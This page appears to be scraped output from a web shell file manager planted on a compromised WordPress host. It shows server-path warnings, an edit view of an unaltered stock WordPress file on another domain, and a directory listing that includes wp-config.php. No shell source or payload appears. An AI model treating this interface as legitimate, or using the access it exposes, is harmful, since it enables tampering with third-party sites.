??????????????
??????????????
??????????????
??????????????
Warning : Undefined variable $auth in /home/u627560552/domains/kovexadvisory.com/public_html/666.php on line 546
Warning : Trying to access array offset on value of type null in /home/u627560552/domains/kovexadvisory.com/public_html/666.php on line 546
??????????????
??????????????
??????????????
??????????????
File Manager
✏️ Edit File: /home/mklsvubc/sendmaxagency.com/wp-links-opml.php
⬅ Kembali
<?php
/**
* Outputs the OPML XML format for getting the links defined in the link
* administration. This can be used to export links from one blog over to
* another. Links aren't exported by the WordPress export, so this file handles
* that.
*
* This file is not added by default to WordPress theme pages when outputting
* feed links. It will have to be added manually for browsers and users to pick
* up that this file exists.
*
* @package WordPress
*/
require_once __DIR__ . '/wp-load.php';
header( 'Content-Type: text/xml; charset=' . get_option( 'blog_charset' ), true );
$link_cat = '';
if ( ! empty( $_GET['link_cat'] ) ) {
$link_cat = $_GET['link_cat'];
if ( ! in_array( $link_cat, array( 'all', '0' ), true ) ) {
$link_cat = absint( urldecode( $link_cat ) );
}
}
echo '<?xml version="1.0"?' . ">\n";
?>
<opml version="1.0">
<head>
<title>
<?php
/* translators: %s: Site title. */
printf( __( 'Links for %s' ), esc_attr( get_bloginfo( 'name', 'display' ) ) );
?>
</title>
<dateCreated><?php echo gmdate( 'D, d M Y H:i:s' ); ?> GMT</dateCreated>
<?php
/**
* Fires in the OPML header.
*
* @since 3.0.0
*/
do_action( 'opml_head' );
?>
</head>
<body>
<?php
if ( empty( $link_cat ) ) {
$cats = get_categories(
array(
'taxonomy' => 'link_category',
'hierarchical' => 0,
)
);
} else {
$cats = get_categories(
array(
'taxonomy' => 'link_category',
'hierarchical' => 0,
'include' => $link_cat,
)
);
}
foreach ( (array) $cats as $cat ) :
/** This filter is documented in wp-includes/bookmark-template.php */
$catname = apply_filters( 'link_category', $cat->name );
?>
<outline type="category" title="<?php echo esc_attr( $catname ); ?>">
<?php
$bookmarks = get_bookmarks( array( 'category' => $cat->term_id ) );
foreach ( (array) $bookmarks as $bookmark ) :
/**
* Filters the OPML outline link title text.
*
* @since 2.2.0
*
* @param string $title The OPML outline title text.
*/
$title = apply_filters( 'link_title', $bookmark->link_name );
?>
<outline text="<?php echo esc_attr( $title ); ?>" type="link" xmlUrl="<?php echo esc_url( $bookmark->link_rss ); ?>" htmlUrl="<?php echo esc_url( $bookmark->link_url ); ?>" updated="
<?php
if ( '0000-00-00 00:00:00' !== $bookmark->link_updated ) {
echo $bookmark->link_updated;
}
?>
" />
<?php
endforeach; // $bookmarks
?>
</outline>
<?php
endforeach; // $cats
?>
</body>
</opml>
Nama
Tipe
Ukuran
Diubah
Aksi
📁 .tmb
dir
—
2026-06-24 09:38
📁 .well-known
dir
—
2025-08-13 03:25
📁 cgi-bin
dir
—
2025-08-13 03:25
📁 seobulider
dir
—
2026-06-03 08:17
📁 wp-admin
dir
—
2026-05-31 12:21
📁 wp-content
dir
—
2026-06-25 06:23
📁 wp-includes
dir
—
2026-06-20 17:49
📄 .hcflag
hcflag
31 B
2026-06-23 22:30
📄 .htaccess
htaccess
1.7 KB
2026-06-21 22:33
📄 .htaccess.bk
bk
1.7 KB
2026-06-21 22:29
📄 error_log
file
11.7 KB
2026-06-25 04:14
🐘 index.php
php
420 B
2026-06-25 06:31
📝 license.txt
txt
19.4 KB
2026-06-20 17:19
🌐 readme.html
html
7.2 KB
2026-06-20 17:19
📝 robots.txt
txt
1.2 KB
2026-06-17 03:09
🐘 wp-activate.php
php
7.2 KB
2026-05-22 04:00
🐘 wp-blog-header.php
php
351 B
2020-02-06 11:33
🐘 wp-comments-post.php
php
2.3 KB
2023-06-14 18:11
🐘 wp-config-sample.php
php
3.3 KB
2026-06-20 17:19
🐘 wp-config.php
php
3.7 KB
2026-06-21 22:33
🐘 wp-cron.php
php
5.5 KB
2024-08-02 23:40
🐘 wp-links-opml.php
php
2.4 KB
2025-12-03 10:04
🐘 wp-load.php
php
3.8 KB
2024-03-11 14:05
🐘 wp-login.php
php
50.6 KB
2026-05-22 04:01
🐘 wp-mail.php
php
8.5 KB
2025-12-03 10:04
🐘 wp-settings.php
php
31.9 KB
2026-05-22 04:00
🐘 wp-signup.php
php
33.8 KB
2026-05-22 04:00
🐘 wp-trackback.php
php
5.1 KB
2025-12-03 10:04
🐘 xmlrpc.php
php
3.1 KB
2024-11-08 20:52